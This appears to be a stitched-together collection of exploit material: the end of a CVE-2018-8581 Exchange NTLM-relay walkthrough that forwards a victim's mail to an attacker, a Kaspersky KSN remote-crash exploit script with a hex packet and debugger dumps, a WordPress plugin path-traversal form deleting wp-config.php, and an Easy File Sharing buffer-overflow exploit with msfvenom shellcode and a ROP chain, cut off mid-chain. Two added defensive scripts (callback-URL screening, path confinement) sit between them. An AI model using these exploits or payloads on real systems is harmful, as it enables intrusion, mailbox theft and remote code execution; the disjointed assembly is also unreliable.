# must be the same as evil_httpserver_url in exch_ews_pushsubscribe.py
httpport=8080
# replace the following values with the valid IP/address, port and protocol ('http' or 'https') of EWS
Target_ip='exch2016.contoso.local'
Target_Port=443
proto='https'
#proto='http'
#path to ews
url='/ws/exchange.asmx'
# SMTP address of the attacker's mailbox (it will receive every e-mail sent to the victim)
Attacker='Attacker@contoso.local'
VICTIM_SID='S-1-5-21-4187549019-2363330540-1546371449-2604'
Once the script has the correct variables, we can start it.
7. The next step is to set the proper variables in the exch_ews_pushsubscribe.py script.
# replace the following values with the valid IP/address, port and protocol ('http' or 'https')
ip='exch2016.contoso.local'
TCP_PORT=443
#proto='http'
proto='https'
# attacker's credentials
user='attacker'
domain='contoso.local'
pass='p@ssw0rd'
url='/ws/exchange.asmx'
# URL of the HTTP server that will use the NTLM hash to impersonate the victim
Evil_httpserver_url='http://192.168.50.173:8080/TEST'
Once that is done, we can run the script:
8. The last step. Some event needs to trigger the push notification. You can wait a while, or do something such as creating or sending a new e-mail or deleting a new file.
If it succeeds, you should receive an inbound connection from the Exchange server to ServerHttp_RelayNtlm.py.
If the attack succeeded, the last response shows UpdateInboxRulesResponse ResponseClass="Success". This means an inbox rule was added to the victim's mailbox and all inbound mail will be forwarded to the attacker.
Now that everything is ready, it's time to test it. We need to send an e-mail to the victim from an account that is not the destination of the new rule (in this case attacker@contoso.local), because the rule does not forward e-mail when the source and destination are the same address. Let's log in as the administrator and send the victim some "sensitive" information.
Checking the attacker's inbox, we see the message was forwarded successfully.
As you can see, the new e-mail is forwarded to the attacker. Similar results can be achieved through other EWS APIs, such as AddDelegate or assigning edit permissions on the target folder.
0x03 Patch
Microsoft assigned CVE-2018-8581 to this vulnerability and addressed it with mitigations in its November release. In fact, the vulnerability itself is not fixed yet. Instead, Microsoft stresses that the registry key needs to be removed; removing this key enables the loopback check. Recall from above that the Exchange server sets the following registry key by default:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck = 1
If the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck key is removed, the vulnerability is not exploitable. To remove the registry key, enter the following command in a CMD window:
After removing the key, there is no need to reboot the server or restart Exchange. The announcement states that future Exchange updates will no longer enable the registry key by default.
0x04 Summary
E-mail has become a core component of our business lives, and Exchange servers have been a hot target for years. The vulnerability allows user impersonation and, combined with a previously reported vulnerability, arbitrary code execution. Both situations suggest that sometimes the biggest security risk comes from the inside. These vulnerabilities show how an external attacker can spread from a single entry point across an entire enterprise.
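Two defender-side checks for the issue described in the analysis and patch sections above, added here as an example; this is not code from the original article or from ZDI's scripts. The first interprets the DisableLoopbackCheck value whose removal is the published mitigation (the live read only works on Windows). The second screens an EWS Subscribe request body for the push-subscription callback URL and allows it only when the hostname is on an explicit allowlist, since the SSRF lies in Exchange calling back to whatever URL the subscriber names. The SOAP sample, the allowlist host notify.contoso.local and all function names are constructed for this example.

```python
import sys
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# EWS "types" namespace; a PushSubscriptionRequest carries its callback in <t:URL>.
EWS_TYPES_NS = "http://schemas.microsoft.com/exchange/services/2006/types"

# Constructed sample: a minimal EWS Subscribe call with a push subscription whose
# callback points at the listener address used in the write-up (192.168.50.173:8080).
SAMPLE_REQUEST = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest>
        <t:FolderIds><t:DistinguishedFolderId Id="inbox"/></t:FolderIds>
        <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
        <t:StatusFrequency>1</t:StatusFrequency>
        <t:URL>http://192.168.50.173:8080/TEST</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>"""


def classify_loopback_check(value):
    # value is the data of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck,
    # or None when the value is absent (the state the mitigation asks for).
    if value is None or value == 0:
        return "ok"            # loopback check active
    return "vulnerable"        # 1: check disabled, relayed SYSTEM NTLM auth is accepted


def read_loopback_check():
    """Windows only: read the live value; returns None when it is absent."""
    import winreg  # stdlib on Windows, unavailable elsewhere
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Lsa") as key:
        try:
            data, _ = winreg.QueryValueEx(key, "DisableLoopbackCheck")
        except FileNotFoundError:
            return None
    return data


def push_subscription_urls(soap_xml):
    """Every push-subscription callback URL named in an EWS request body."""
    root = ET.fromstring(soap_xml)
    tag = "{" + EWS_TYPES_NS + "}URL"
    return [el.text.strip() for el in root.iter(tag) if el.text]


def screen_callback_url(url, allowed_hosts):
    """'allow' only http(s) URLs whose hostname is on the explicit allowlist.
    IP literals are refused: a sanctioned notification listener has a DNS name."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https") or not host:
        return "reject"
    try:
        ipaddress.ip_address(host)
        return "reject"
    except ValueError:
        pass  # not an IP literal, check the name against the allowlist
    return "allow" if host in allowed_hosts else "reject"


def screen_request(soap_xml, allowed_hosts):
    """(url, verdict) for each callback URL in the request body."""
    return [(u, screen_callback_url(u, allowed_hosts)) for u in push_subscription_urls(soap_xml)]


if __name__ == "__main__":
    for url, verdict in screen_request(SAMPLE_REQUEST, {"notify.contoso.local"}):
        print(verdict, url)
    if sys.platform == "win32":
        print("DisableLoopbackCheck:", classify_loopback_check(read_loopback_check()))
```

The allowlist check belongs wherever EWS request bodies are visible to the defender (a reverse proxy or WAF in front of /EWS), and the registry check belongs in the Exchange server's configuration baseline; neither replaces removing the value as the article describes.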
'''
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
# CVE: NotYet
#
# Exploit description:
# Kaspersky KSN v5.2 is prone to a remote memory corruption because it
# fails to properly filter the input on the remote subscribers; this
# leads to heap segments overwrite and it leads to remote code execution.
#
#
# Program description:
# Kaspersky KSN for Linux enables cloud-assisted, multi-layered
# security for servers and workstations running the Linux operating
# system. It delivers reliable protection with minimal impact on
# performance.
# Product homepage: http://kaspersky.com
#
# Example usage: python kaspersky.py 192.168.1.1 6349
#
# [!] Valgrind output:
#
# =3314== Invalid write of size 4
# ==3314== at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd
# ==3314==
# ==3314==
# ==3314== Process terminating with default action of signal 11
(SIGSEGV): dumping core
# ==3314== Access not within mapped region at address 0x0
# ==3314== at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314== If you believe this happened as a result of a stack
# ==3314== overflow in your program's main thread (unlikely but
# ==3314== possible), you can try to increase the size of the
# ==3314== main thread stack using the --main-stacksize= flag.
# ==3314== The main thread stack size used in this run was 8388608.
# ==3314==
# ==3314== HEAP SUMMARY:
# ==3314== in use at exit: 769,426 bytes in 7,522 blocks
# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534
bytes allocated
# ==3314==
# ==3314== LEAK SUMMARY:
# ==3314== definitely lost: 8 bytes in 1 blocks
# ==3314== indirectly lost: 0 bytes in 0 blocks
# ==3314== possibly lost: 5,328 bytes in 9 blocks
# ==3314== still reachable: 764,090 bytes in 7,512 blocks
# ==3314== of which reachable via heuristic:
# ==3314== newarray : 8,264 bytes in 4 blocks
# ==3314== suppressed: 0 bytes in 0 blocks
#
# [!] Debugger output:
#
# [----------------------------------registers-----------------------------------]
# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->
0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# RBX: 0x0
# RCX: 0x7f7ee2913000 --> 0x0
# RDX: 0xffffffffffdf6bf0
# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# RDI: 0x0
# RBP: 0x7f7ee28f5338 --> 0x81
# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# RIP: 0x7f7ee18b3a74
(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
mov DWORD PTR [rdi],0x1)
# R8 : 0x0
# R9 : 0x7
# R10: 0x2
# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800
# R12: 0x29b
# R13: 0x0
# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b
# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
# 0x7f7ee18b3a6e: xchg ax,ax
# 0x7f7ee18b3a70
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:
push rbx
# 0x7f7ee18b3a71
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:
mov rbx,rdi
# => 0x7f7ee18b3a74
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
mov DWORD PTR [rdi],0x1
# 0x7f7ee18b3a7a
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:
lea rdi,[rdi+0x10]
# 0x7f7ee18b3a7e
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:
call 0x7f7ee184a8a0
<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt>
# 0x7f7ee18b3a83
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:
mov BYTE PTR [rbx+0x4],0x0
# 0x7f7ee18b3a87
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:
pop rbx
# [------------------------------------stack-------------------------------------]
# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815
(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:
mov rdi,QWORD PTR [rsp+0x110])
# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd
# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045
# 0032| 0x7ffe127425e0 --> 0x361
# 0040| 0x7ffe127425e8 --> 0x0
# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->
0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)
# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# gdb-peda$ where
# #0 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) ()
# #2 0x00007f7ee189f741 in
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long
'''
import binascii
import sys
import socket
import time
def rocksDB(target,port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Bind port
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
            packet = \
binascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')
            # Log the packet in hexa and timestamp
            fileLog = target + ".log"
            logPacket = open("exploit.log", "w+")
            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Writing to socket: " + binascii.hexlify(bytes(packet))+"\n")
            logPacket.close()
            # Write bytecodes to socket
            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing to socket: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
            except socket.error, e:
                print '[!] Sorry, No data available'
                continue
            s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"
def howtouse():
    print "Usage: kaspersky.py hostname port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)
if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])
        print "[*] Kaspersky KSN 0-Day by Juan Sacco <jsacco@exploitpack.com>"
        rocksDB(target, port)
    except IndexError:
        howtouse()
<!--
# Exploit Title: Plugin to Wordpress Woo Import Export 1.0 RCE – Unlink
# Date: 24/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: * https://wordpress.org/plugins/woo-import-export-lite/
# Software Link: * https://wordpress.org/plugins/woo-import-export-lite/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0
# Tested on: Ubuntu 16.1
1 - Description
- Type user access: any user registered.
- $_POST['file_name'] is not escaped.
Article:
*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/
Video:
*https://www.youtube.com/watch?v=pImtGeecdCk
2. Proof of Concept
-->
<form method="post"
action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
<input type="text" name="file_name" value="../../../wp-config.php">
<input type="text" name="log_id" value="aaa">
<input type="submit">
</form>
<!--
- Date Discovery : *11/25/2017*
- Date Vendor Contact : *12/29/2017*
- Date Publish : 24/04/2018
- Date Resolution :
-->
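The advisory above boils down to one missing check: the file_name value reaches an unlink call without being confined to the plugin's export directory, so a traversal string such as ../../../wp-config.php deletes a file the caller should never be able to touch. The following is an added example, not the plugin's own code, written in Python for a generic delete-by-name handler: the naive construction beside a hardened one that refuses any directory component, resolves symlinks, pins the result to the export directory and restricts the extension. The directory layout, file names, allowed suffixes and function names are constructed for this example.

```python
import os
import shutil
import tempfile
from pathlib import Path

ALLOWED_SUFFIXES = {".csv", ".xml", ".json"}  # what an export file may be named (assumption)


def naive_target(export_dir, file_name):
    """The pattern behind the advisory: user input glued onto the export
    directory with no check, so '../../../wp-config.php' walks out of it."""
    return os.path.join(os.fspath(export_dir), file_name)


def hardened_target(export_dir, file_name):
    """Return a Path inside export_dir, or None when the request must be refused."""
    if not file_name or file_name != os.path.basename(file_name):
        return None                              # any directory component is refused
    base = Path(export_dir).resolve()
    candidate = (base / file_name).resolve()     # resolve() also follows symlinks
    if candidate.parent != base:
        return None                              # '.' and '..' land here
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None                              # a .php planted in the directory stays put
    if not candidate.is_file():
        return None
    return candidate


def remove_export(export_dir, file_name):
    """Delete one export file; True when something was removed."""
    target = hardened_target(export_dir, file_name)
    if target is None:
        return False
    target.unlink()
    return True


def build_fixture():
    """Constructed stand-in for a WordPress tree: exports three levels below wp-config.php."""
    root = Path(tempfile.mkdtemp(prefix="wie-")).resolve()
    export_dir = root / "wp-content" / "uploads" / "wpie-exports"
    export_dir.mkdir(parents=True)
    (export_dir / "orders.csv").write_text("id,total\n1,9.99\n")
    (root / "wp-config.php").write_text("<?php /* constructed stand-in */\n")
    return root, export_dir


def demo():
    """Run the traversal string from the advisory through both versions."""
    root, export_dir = build_fixture()
    traversal = "../../../wp-config.php"
    try:
        return {
            "naive_resolves_outside": Path(naive_target(export_dir, traversal)).resolve()
            == root / "wp-config.php",
            "hardened_refuses_traversal": hardened_target(export_dir, traversal) is None,
            "hardened_refuses_dotdot": hardened_target(export_dir, "..") is None,
            "hardened_allows_export": remove_export(export_dir, "orders.csv"),
            "export_removed": not (export_dir / "orders.csv").exists(),
            "config_intact": (root / "wp-config.php").exists(),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for check, passed in demo().items():
        print(f"{check}: {passed}")
```

In the plugin itself the same confinement would sit in the admin-ajax handler, next to the capability check and nonce verification that the advisory's "any registered user" note says are missing there too.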
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------#
# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date : 04/24/2018 #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sharing-file.com/ #
# Software Link : http://www.sharing-file.com/efssetup.exe #
# Original Exploit: https://www.exploit-db.com/exploits/44485/ #
# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 #
#---------------------------------------------------------------------------------------------------#
import requests
import struct
import time
host='192.168.80.148'
port='80'
# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer = '\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)
# mona.py VirtualProtect() ROP template with few modifications
# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]
# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
